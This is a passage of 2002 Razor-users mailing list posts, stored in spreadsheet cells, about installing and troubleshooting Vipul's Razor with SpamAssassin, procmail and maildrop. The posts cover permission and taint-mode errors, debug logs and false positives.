owner to read and execute won't alleviate a write problem.On Thu, 5 Sep 2002, Michael Duff wrote:&gt; This is due to insufficient write privileges to the "razor-agent.log" 
&gt; file. A quick work-around is to do a "chmod go+rx" on that file (of 
&gt; course, it's better to restrict the access as much as possible).
&gt; 
&gt; In Agent.pm, when the Razor2::Logger object is created, if it doesn't 
&gt; have write permission to the log file it does not succeed. Then, later 
&gt; in the code when the log object is used, it fails with the "unblessed" 
&gt; error.
&gt; 
&gt; Hope this helps,
&gt; Michael Duff
&gt; 
&gt; David Rees wrote:
&gt; 
&gt; &gt;This is my first time running Razor, heard a lot of good things about it so
&gt; &gt;I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
&gt; &gt;integrate the two.
&gt; &gt;
&gt; &gt;I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
&gt; &gt;shoot the message here first
&gt; &gt;
&gt; &gt;With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
&gt; &gt;messages spit out from spamd:
&gt; &gt;
&gt; &gt;razor2 check skipped: No such file or directory Can't call method "log" on
&gt; &gt;unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
&gt; &gt;line 211,  line 75.
&gt; &gt;
&gt; &gt;Any ideas?  razor seems to run correctly over the command line.
&gt; &gt;
&gt; &gt;Thanks,
&gt; &gt;-Dave
&gt; &gt;
&gt; &gt;
&gt; &gt;-------------------------------------------------------
&gt; &gt;This sf.net email is sponsored by: OSDN - Tired of that same old
&gt; &gt;cell phone?  Get a new here for FREE!
&gt; &gt;https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
&gt; &gt;_______________________________________________
&gt; &gt;Razor-users mailing list
&gt; &gt;Razor-users@lists.sourceforge.net
&gt; &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
&gt; &gt;  
&gt; &gt;
&gt;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</si>
  <si>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
Theo,Thank you very much, it solves the problem!!!!Eugene
-----Original Message-----
From: razor-users-admin@example.sourceforge.net
[mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van
Dinter
Sent: September 5, 2002 4:38 PM
To: Eugene Chiu
Cc: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] spamassassin+razor2
On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote:
&gt; razor2 check skipped: Bad file descriptor Insecure dependency in open
while runn
&gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm
line
&gt; 410,  line 1.
&gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002
&gt;  Subject: *****SPAM***** Computer Maintenance
&gt;   Folder: /home/eugene/caughtspam
8343It looks like you're running via procmail -- what are the permissions
on procmail?  "Insecure dependency" screams "I'm in taint mode!", which
is a typical problem when procmail is setuid/setgid (the permissions
should be 755).If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes"
in the procmailrc. :)--
Randomly Generated Tagline:
"The bus had no heat, blew over in the wind and used the driver's legs
 as its first line of defense in an accident." - Unknown about the VW Bus-------------------------------------------------------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</si>
  <si>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This is due to insufficient write privileges to the "razor-agent.log" 
file. A quick work-around is to do a "chmod go+rx" on that file (of 
course, it's better to restrict the access as much as possible).In Agent.pm, when the Razor2::Logger object is created, if it doesn't 
have write permission to the log file it does not succeed. Then, later 
in the code when the log object is used, it fails with the "unblessed" 
error.Hope this helps,
Michael DuffDavid Rees wrote:&gt;This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</si>
  <si>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Forgive me for being a partially stupid end-user of this fantastic
spam fighting software.I was looking at my spamd debug output today, and noticed that it ran
through Razor2 stuff, and then it ran through dccproc, and then it tried to
go through old Razor1 stuff.  I'm assuming (and please correct me if I'm
wrong) that Razor1 is out dated and was to be replaced entirely by Razor2.If that's the case, can someone please point me to something that explains
how to remove Razor1 from my system?  I don't see a point in envoking it.
Especially when it appears to error out on me.debug: Razor1 is available
debug: entering helper-app run mode
debug: Razor Agents 1.19, protocol version 2.
debug: 170803 seconds before closest server discovery
debug: Agent terminated
Problem while trying to load Razor1: Permission denied  at
/usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 288.
debug: leaving helper-app run modeThanks!-- 
Josh Hildebrand          Email: josh@jedi.net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</si>
  <si>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You might be better asking this on the spamassassin-talk list.  The folks 
there will almost definitely have an answer for this.On Thu, 5 Sep 2002, David Rees wrote:&gt;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</si>
  <si>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On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
&gt; You might be better asking this on the spamassassin-talk list.  The folks 
&gt; there will almost definitely have an answer for this.Thanks, I just posted a similar message there.-Dave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</si>
  <si>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This is my first time running Razor, heard a lot of good things about it so
I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
integrate the two.I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
shoot the message here firstWith a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
messages spit out from spamd:razor2 check skipped: No such file or directory Can't call method "log" on
unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
line 211,  line 75.Any ideas?  razor seems to run correctly over the command line.Thanks,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</si>
  <si>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No as a answer to this FAQ, would the recommended answer be to a) chmod 755 /usr/bin/procmailor b) add DROPPRIVS=yes to /etc/procmailrcor c) all of the above
I ask because I just did B, and my procmail is still:
-rwsr-sr-x    1 root     mail        67988 Jul 24 15:43 /usr/bin/procmail
But things seem to be working, so far..
On Thu, Sep 05, 2002 at 06:18:55PM -0400, Eugene Chiu wrote:
&gt; 
&gt; Theo,
&gt; 
&gt; Thank you very much, it solves the problem!!!!
&gt; 
&gt; Eugene
&gt; 
&gt; 
&gt; -----Original Message-----
&gt; From: razor-users-admin@example.sourceforge.net
&gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van
&gt; Dinter
&gt; Sent: September 5, 2002 4:38 PM
&gt; To: Eugene Chiu
&gt; Cc: razor-users@example.sourceforge.net
&gt; Subject: Re: [Razor-users] spamassassin+razor2
&gt; 
&gt; 
&gt; On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote:
&gt; &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open
&gt; while runn
&gt; &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm
&gt; line
&gt; &gt; 410,  line 1.
&gt; &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002
&gt; &gt;  Subject: *****SPAM***** Computer Maintenance
&gt; &gt;   Folder: /home/eugene/caughtspam
&gt; 8343
&gt; 
&gt; It looks like you're running via procmail -- what are the permissions
&gt; on procmail?  "Insecure dependency" screams "I'm in taint mode!", which
&gt; is a typical problem when procmail is setuid/setgid (the permissions
&gt; should be 755).
&gt; 
&gt; If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes"
&gt; in the procmailrc. :)
&gt; 
&gt; --
&gt; Randomly Generated Tagline:
&gt; "The bus had no heat, blew over in the wind and used the driver's legs
&gt;  as its first line of defense in an accident." - Unknown about the VW Bus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Josh Hildebrand          Email: josh@jedi.net
Digital Sluice           Pager: http://www.digitalsluice.com/josh/pager
Phone: 512-255-9797      eFax: 413-691-9191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</si>
  <si>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I just set up razor and spamassassin, but I keep getting this error in my 
mail log filerazor2 check skipped: No such file or directory Can't call method "log" on 
unblessed reference at 
/usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.I have looked through the archived list and the only thing I have seen 
about this error is a possible permission problem on the log file.
I did what it said in the archives, basically change the permission on the 
file but its still no go.Any other help would be appreciated, maybe I'm missing something.
something I forgot to run or do.
rob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</si>
  <si>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On Mon, Sep 09, 2002 at 05:10:23PM -0400, Rob wrote:
&gt;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file.Yeah, the answer isn't here in this list, it's on the spamassassin-users
list.  I just asked it late last week.Hint:  Add -H to the spamd startup flags using the latest version of
spamassassin.-Dave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</si>
  <si>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Or, you could do this. On Mon, 9 Sep 2002, David Rees wrote:&gt; On Mon, Sep 09, 2002 at 05:10:23PM -0400, Rob wrote:
&gt; &gt; I just set up razor and spamassassin, but I keep getting this error in my 
&gt; &gt; mail log file
&gt; &gt; 
&gt; &gt; razor2 check skipped: No such file or directory Can't call method "log" on 
&gt; &gt; unblessed reference at 
&gt; &gt; /usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.
&gt; &gt; 
&gt; &gt; I have looked through the archived list and the only thing I have seen 
&gt; &gt; about this error is a possible permission problem on the log file.
&gt; 
&gt; Yeah, the answer isn't here in this list, it's on the spamassassin-users
&gt; list.  I just asked it late last week.
&gt; 
&gt; Hint:  Add -H to the spamd startup flags using the latest version of
&gt; spamassassin.
&gt;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</si>
  <si>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It's a permissions issue on the razor log file.  SpamAssassin runs setuid 
to the user to whom mail is being delivered.You'll need to make the razor log file world writable.On Mon, 9 Sep 2002, Rob wrote:&gt;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&gt; I did what it said in the archives, basically change the permission on the 
&gt; file but its still no go.
&gt; 
&gt; Any other help would be appreciated, maybe I'm missing something.
&gt; something I forgot to run or do.
&gt; 
&gt; 
&gt; rob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</si>
  <si>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Hey FolksI know this question gets asked a lot, but I haven't seen an answer lately.Any idea when a user will be able to view his own trust rating?   What are
the plans for this?  Will it be built into the client, web based, emailed
to you nightly?  If you could share your brainstorming on the subject, I
would greatly appreciate it.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</si>
  <si>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Does anyone else experience this:http://sf.net/tracker/index.php?func=detail&amp;aid=600311&amp;group_id=3978&amp;atid=10
3978Also, it seems that the bugs tracker on SF isn't used very much ... is there
somewhere else to post bugs?- Colin-------------------------------------------------------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</si>
  <si>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I have a spamd/spamc/razor/dcc setup.My razor logs are full of:Sep 10 09:48:48.411339 check[10200]: [ 1] [bootup] Logging initiated 
LogDebugLevel=3 to file:/home/omega13/.razor/razor-agent.log
Sep 10 09:48:49.391309 check[10200]: [ 3] mail 1 is not known spam.The problem is that all the entries show "is not known spam"  I can't believe 
I'm that lucky.  So, how do I test to see that my razor installation is 
working properly.  I've been up to my ears in documentation for the past few 
days, so, if the reference is easy, just point me to it.  Otherwise a brief 
hint on how to, would be appreciated.
-- 
Robin Lynn Frank
Paradigm-Omega, LLC
==================================
Gandalf fell at Khazadum.
Sheridan fell at Z'ha'dum.
Avoid high places in 
locations ending in "dum"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</si>
  <si>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On Tue, 10 Sep 2002, Rose, Bobby wrote:&gt; Use the sample-spam.txt from Spamassassin and do a "razor-check -d &lt;
&gt; sample-spam.txt"Interesting.  I just upgraded to razor-agents 2.14 yesterday, ran
razor-admin -register.  I to am seeing that I'm not getting any positives
from razor.  Including the sample-spam.txt's from spamassassin 2.41, 2.31,
and 2.20.Any suggestions?  thanks.-d output belowmaxwell:/var/qmail/alias/gb-users%# razor-check -d &lt;
/usr/local/src/Mail-SpamAssassin-2.20/sample-spam.txt
 Razor-Log: Computed razorhome from env: /root/.razor
 Razor-Log: Found razorhome: /root/.razor
 Razor-Log: No /root/.razor/razor-agent.conf found, skipping.
 Razor-Log: No razor-agent.conf found, using defaults. 
Sep 12 12:04:13.785852 check[52238]: [ 1] [bootup] Logging initiated
LogDebugLevel=9 to stdout
Sep 12 12:04:13.787113 check[52238]: [ 5] computed razorhome=/root/.razor,
conf=, ident=/root/.razor/identity-ruqVa5jbuS
Sep 12 12:04:13.787442 check[52238]: [ 2]  Razor-Agents v2.14 starting
razor-check -d
Sep 12 12:04:13.789903 check[52238]: [ 9] uname -a: FreeBSD
maxwell.gta.com 4.5-RELEASE-p3 FreeBSD 4.5-RELEASE-p3 #0: Wed May 22
14:52:29 EDT 2002     root@maxwell.gta.com:/usr/src/sys/compile/maxwell
i386
Sep 12 12:04:13.790480 check[52238]: [ 8] reading straight RFC822 mail
from 
Sep 12 12:04:13.791397 check[52238]: [ 6] read 1 mail
Sep 12 12:04:13.791917 check[52238]: [ 8] Client supported_engines: 1 2 3
4
Sep 12 12:04:13.792948 check[52238]: [ 8]  prep_mail done: mail 1
headers=1432, mime0=3139
Sep 12 12:04:13.793639 check[52238]: [ 6] skipping whitelist file
(empty?): /root/.razor/razor-whitelist
Sep 12 12:04:13.794295 check[52238]: [ 5] read_file: 1 items read from
/root/.razor/servers.discovery.lst
Sep 12 12:04:13.794871 check[52238]: [ 5] read_file: 1 items read from
/root/.razor/servers.nomination.lst
Sep 12 12:04:13.795382 check[52238]: [ 5] read_file: 3 items read from
/root/.razor/servers.catalogue.lst
Sep 12 12:04:13.796047 check[52238]: [ 9] Assigning defaults to
honor.cloudmark.com
Sep 12 12:04:13.796456 check[52238]: [ 9] Assigning defaults to
apt.cloudmark.com
Sep 12 12:04:13.796829 check[52238]: [ 9] Assigning defaults to
fire.cloudmark.com
Sep 12 12:04:13.797180 check[52238]: [ 9] Assigning defaults to
truth.cloudmark.com
Sep 12 12:04:13.798322 check[52238]: [ 5] read_file: 11 items read from
/root/.razor/server.apt.cloudmark.com.conf
Sep 12 12:04:13.799188 check[52238]: [ 5] read_file: 11 items read from
/root/.razor/server.honor.cloudmark.com.conf
Sep 12 12:04:13.799866 check[52238]: [ 5] 96778 seconds before closest
server discovery
Sep 12 12:04:13.800342 check[52238]: [ 6] apt.cloudmark.com is a Catalogue
Server srl 51; computed min_cf=1, Server se: 0A
Sep 12 12:04:13.800818 check[52238]: [ 8] Computed supported_engines: 2 4
Sep 12 12:04:13.801167 check[52238]: [ 8] Using next closest server
apt.cloudmark.com:2703, cached info srl 51
Sep 12 12:04:13.801513 check[52238]: [ 8] mail 1 Subject: Home Based
Business for Grownups
Sep 12 12:04:13.805467 check[52238]: [ 6] preproc: mail 1.0 went from 3139
bytes to 3100 
Sep 12 12:04:13.805878 check[52238]: [ 6] computing sigs for mail 1.0, len
3100
Sep 12 12:04:13.809475 check[52238]: [ 5] Connecting to apt.cloudmark.com
...
Sep 12 12:04:18.587441 check[52238]: [ 8] Connection established
Sep 12 12:04:18.587929 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 29 server
greeting: sn=C&amp;srl=51&amp;ep4=7542-10&amp;a=l
Sep 12 12:04:18.588562 check[52238]: [ 6] apt.cloudmark.com is a Catalogue
Server srl 51; computed min_cf=1, Server se: 0A
Sep 12 12:04:18.589041 check[52238]: [ 8] Computed supported_engines: 2 4
Sep 12 12:04:18.589432 check[52238]: [ 8] mail 1.0 e2
sig: PGFfFte87P3Ve-CPTdu3NWgiBikA
Sep 12 12:04:18.589751 check[52238]: [ 8] mail 1.0 e4
sig: k6oGZsa1AvVolyvalWx2AACdWb8A
Sep 12 12:04:18.590103 check[52238]: [ 8] preparing 2 queries
Sep 12 12:04:18.590638 check[52238]: [ 8] sending 1 batches
Sep 12 12:04:18.591087 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 96
Sep 12 12:04:18.591324 check[52238]: [ 6]
-a=c&amp;e=2&amp;s=PGFfFte87P3Ve-CPTdu3NWgiBikA
a=c&amp;e=4&amp;ep4=7542-10&amp;s=k6oGZsa1AvVolyvalWx2AACdWb8A
.
Sep 12 12:04:19.270870 check[52238]: [ 4] apt.cloudmark.com &gt;&gt; 14
Sep 12 12:04:19.271227 check[52238]: [ 6] response to sent.1
-p=0
p=0
.
Sep 12 12:04:19.272130 check[52238]: [ 6] mail 1.0 e=2
sig=PGFfFte87P3Ve-CPTdu3NWgiBikA: sig not found.
Sep 12 12:04:19.272449 check[52238]: [ 6] mail 1.0 e=4
sig=k6oGZsa1AvVolyvalWx2AACdWb8A: sig not found.
Sep 12 12:04:19.272760 check[52238]: [ 7] method 5: mail
1.0: no-contention part, spam=0
Sep 12 12:04:19.273012 check[52238]: [ 7] method 5: mail 1: a
non-contention part not spam, mail not spam
Sep 12 12:04:19.273257 check[52238]: [ 3] mail 1 is not known spam.
Sep 12 12:04:19.273578 check[52238]: [ 5] disconnecting from server
apt.cloudmark.com
Sep 12 12:04:19.273982 check[52238]: [ 4] apt.cloudmark.com &lt;&lt; 5
Sep 12 12:04:19.274203 check[52238]: [ 6] a=q
Sep 12 12:04:19.274585 check[52238]: [ 8] razor-check finished
successfully.---
david raistrick
drais@atlasta.net		http://www.expita.com/nomime.html
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">To continue the subject on an otherwise unrelated note, the following
personal correspondence was just flagged as spam:The following is a slightly modified e-mail message trapped in a server-wide
spam box.------
NEWSPAPER?????any time estimate when we can expect you home?
dad
                    &lt;********@**********       To:
&lt;*************@***************&gt;
                    *********&gt;                 cc:
                                               Subject:     Oh, yeah
                    09/12/2002 12:43 PM
I have to stay after school today so I can work on the school newspaper
(layout) -- Nords will bring me home later than usual.------I don't know how to explain this one.--Will-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm taking all my razored mail today and calling any 1-800 numbers I can
find.  I say "Hi, I'm calling everyone that spammed me today to raise their
cost of doing business.  You have a great day!"  I'm told I should do it
from a pay phone, so it costs them 50 cents per call.  If more people did
this, we could tie up their phone lines and cost them so much money they
could never make spam work.Also fun is the simple "Die Spammer Die!"Fox-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Haven't heard anything about this, so excuse the repost but:	http://sf.net/tracker/index.php?func=detail&amp;aid=600311&amp;
	  group_id=3978&amp;atid=103978Or should bugs be reported somewhere other than on the SF bug tracker?- Colin
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Is it possible to use razor without filtering empty mails as spamm?
An mail with an attachment is considered spamm. Is this normal?
Or I mysqlf like to send emails to myself where all important is said in
subject and body is empty (for remaining smth).Thanks,
Raido Kurel
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Razor won't filter empty emails. What version of the agents are you using?cheers,
vipul.On Mon, Sep 16, 2002 at 04:16:31PM +0300, Raido Kurel wrote:
&gt; Hi,
&gt; 
&gt; Is it possible to use razor without filtering empty mails as spamm?
&gt; An mail with an attachment is considered spamm. Is this normal?
&gt; Or I mysqlf like to send emails to myself where all important is said in
&gt; subject and body is empty (for remaining smth).
&gt; 
&gt; Thanks,
&gt; Raido Kurel
&gt; 
&gt;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</si>
  <si>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
"Fox" said:&gt; Before or after I whitelisted all the legit mailing lists that Razor is
&gt; tagging?  I had one false positive in the last four days.  Razor tagged some
&gt; guys person-to-person message because he used an ostrich-in-your-face jpeg
&gt; that is probably pretty popular on the net, and -lm 4 means any single
&gt; attachment in a message that is razored, razors the whole message, if I
&gt; understand it correctly.Razor folks: is -lm documented anywhere?   BTW, I notice all my *.conf
files in ~/.razor use "lm = 4" by default anyway.&gt; No, I am not keeping official tally of false positives.  I need to write a
&gt; html interface to do it, and then it would be easy.  I imagine you want
&gt; false positive rate per filter.  I will work on it tomorrow, and maybe in a
&gt; week I will have some stats for false positives.Yeah, that'd be cool -- much appreciated!   comparing text classifiers
like spam filters, without tracking FPs, is not good.   After all, "cat &gt;
/dev/null" gets a 100% hit rate, but without the FP rate figure of, let's
say 90%, you'd never know it was a bad thing to do ;)--j.</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I suggest that you use a normal user to start. Once you are familiar
&gt; enough with razor and understand how it works, try the complex things
&gt; like integration with the MTA and the like.OK, but do I have to launch that command as "root" or what?Thank you
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Using -lm 4 is yielding an extra 20% a day, but it gets false positives
where it shouldn't.Such as an email with a Word doc and the signature below.  After looking at
the Word doc, directions to the sender's cabin, I am convinced it marked the
body, which contains no next except the "IncrediMail advertisment"
signature, as spam.So I have to turn off -lm 4.  Razor has been getting other strange emails it
shouldn't with -lm 4 on.      See the incredimail ad signature I am talking about below:      Fox____________________________________________________
  IncrediMail - Email has finally evolved - Click Here-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Depends on how you want to use it.The default setup of running it from procmail works just fine, as long as 
you remember to go into your postfix/main.cf file, and tell it to use 
procmail instead of the internal delivery agent.On Thu, 19 Sep 2002, Boniforti Flavio wrote:&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Here is my recipe for Maildrop:# Vipul's Razor check
#
log `/usr/bin/razor-check`
log "razor-check = $RETURNCODE"
if ( $RETURNCODE == 0 )
{
  xfilter "reformail -a'X-Razor: SPAM'"
  log "SPAM caught by Vipul's Razor"
  to "$FOLDERS/.SPAM/"
}I used this with Razor version 1.  I'm not sure if it was ever used
with Razor2.  I am now using SpamAssassin w/ Razor2.  You may wish to
remove the log statements once running.I use both.  SpamAssassin (SA) catches things that Razor does not.  There
were enough false positives with Razor that I do not trust it alone.
After whitelisting all the newsletters I receive, SA w/ Razor2 does a
very good job.HTH,
  Jeffrey
Quoting Sunil William Savkar :
&gt; Hi.
&gt;
&gt; I just finished installing and getting running maildrop with my virtual
&gt; users.  I was thinking to set up razor with maildrop as my first test of
&gt; its filtering capabilities..
&gt;
&gt; I have seen documentation out there for procmail, but is there similar
&gt; documentation for integrating maildrop with razor?
&gt; 
&gt;  
&gt; 
&gt; Separately, it looks like many people use spamassassin with razor.  If I
&gt; am using razor2, is there still an advantage to this?
&gt; 
&gt;  
&gt; 
&gt; Thanks in advance.
&gt; 
&gt;  
&gt; 
&gt; Sunil
&gt; 
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff--What is the maildrop recipe you use with spamassassin?  I was trying to
set mine up but I am running into a few difficulties.I think I will try spamassassin first and see how it goes, and then
perhaps fold in razor2... is it easy to fold in?Sunil&gt;
&gt; Here is my recipe for Maildrop:
&gt;
&gt; # Vipul's Razor check
&gt; #
&gt; log `/usr/bin/razor-check`
&gt; log "razor-check = $RETURNCODE"
&gt; if ( $RETURNCODE == 0 )
&gt; {
&gt;   xfilter "reformail -a'X-Razor: SPAM'"
&gt;   log "SPAM caught by Vipul's Razor"
&gt;   to "$FOLDERS/.SPAM/"
&gt; }
&gt;
&gt; I used this with Razor version 1.  I'm not sure if it was ever used with
&gt; Razor2.  I am now using SpamAssassin w/ Razor2.  You may wish to remove
&gt; the log statements once running.
&gt;
&gt; I use both.  SpamAssassin (SA) catches things that Razor does not.
&gt; There were enough false positives with Razor that I do not trust it
&gt; alone. After whitelisting all the newsletters I receive, SA w/ Razor2
&gt; does a very good job.
&gt;
&gt; HTH,
&gt;   Jeffrey
&gt;
&gt;
&gt; Quoting Sunil William Savkar :
&gt;&gt; Hi.
&gt;&gt;
&gt;&gt; I just finished installing and getting running maildrop with my
&gt;&gt; virtual users.  I was thinking to set up razor with maildrop as my
&gt;&gt; first test of its filtering capabilities..
&gt;&gt;
&gt;&gt; I have seen documentation out there for procmail, but is there similar
&gt;&gt; documentation for integrating maildrop with razor?
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; Separately, it looks like many people use spamassassin with razor.  If
&gt;&gt; I am using razor2, is there still an advantage to this?
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; Thanks in advance.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; Sunil
&gt;&gt;
&gt;
&gt;
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by:ThinkGeek
&gt; Welcome to geek heaven.
&gt; http://thinkgeek.com/sf
&gt; _______________________________________________
&gt; Razor-users mailing list
&gt; Razor-users@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/razor-users-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I received a spam email that had apparently forged the From header with
my own email address. After reviewing the message I forwarded it with
the rest of a batch of spam ti the database with razor-report. Now of,
course, my own email address is listed int he Razor database. How do I
go about getting it removed.I have seen this ploy (forged From headers) several time since then.
Perhaps the razor-report need to detect this and emit a warning.dave-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Vipul Ved Prakash said:&gt; Are there any suggestions for "fixing" this in razor-agents? razor-agents
&gt; could write to syslog by default, but I am not sure if that would be
&gt; desirable default behaviour...Hi Vipul,I reckon if the "unwritable log file" error condition could be caught by
Razor and handled gracefully (logging to syslog or /dev/null), it'd be a
great help.As it stands, if the log file is unwritable, the razor check falls over
entirely as the constructor returns undef (unblessed reference = 'die'
error in perl).--j.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm getting "no servers available" about half the time in the last few days.
This is with Razor 2. Is there something I need adjust in the installation
here, or are the servers just down/overloaded?Thanks,
Whit
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I just installed razor 2.152 on a FreeBSD 4.4-RELEASE box and having
problems with razor-check.  Any time razor-check is run, (with or without
arguments), i get this error:Can't use an undefined value as a symbol reference at
/usr/local/lib/perl5/site_perl/5.005/i386-freebsd/Razor2/Client/Agent.pm
line 756.razor-admin runs just fine and the make test before the install was all
ok.Has anyone seen this before?Module versions:
Digest-HMAC-1.01
Digest-MD5-2.20
Digest-Nilsimsa-0.06
Digest-SHA1-2.01
MIME-Base64-2.12
Net-DNS-0.23
Test-Simple-0.44
Time-HiRes-01.20
URI-1.19
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Date: Mon, 30 Sep 2002 14:00:12 -0400 (EDT)
&gt; From: Dayv Gastonguay 
&gt;
&gt; I just installed razor 2.152 on a FreeBSD 4.4-RELEASE box and having
&gt; problems with razor-check.  Any time razor-check is run, (with or without
&gt; arguments), i get this error:
&gt;
&gt; Can't use an undefined value as a symbol reference at
&gt; /usr/local/lib/perl5/site_perl/5.005/i386-freebsd/Razor2/Client/Agent.pm
&gt; line 756.
&gt;
 Try installing the latest Perl (at least 5.6.1) port on Freebsd and make
sure you set the system to use perl from ports (i.e. in the
ports/lang/perl5/files directory run ./use.perl port. Reinstall the relevant
perl modules needed by razor and try again.Sven-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I noticed a drop in checks, and did some tests.  If I move truth up in
my catalog list, a check comes back postive, but if I move fire up in
the list, then I don't get the positive check back.  It's almost like
it's not syncing up with Hubris which is the one my reports are getting
sent to.-=Bobby
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">What does this mean?  I set up procmailrc for a spamtrap but I'm getting
an error.  I also am reporting to pyzor and dcc and they aren't
registering an error.  What's weird is that it works sometimes..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
</t>
  </si>
  <si>
    <t xml:space="preserve">
I recently brought up a new system - SuSe 7.3 and I am running
spamassassin and procmail, which work fine.I tried bringing up razor (2.14) but I am not able to get the SDK to
install and razor reports missing modules. They appear to be there. I
followed the installation directions. There appears to be an endless list
of errors. Any ideas on what to do or where to start?Doug
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
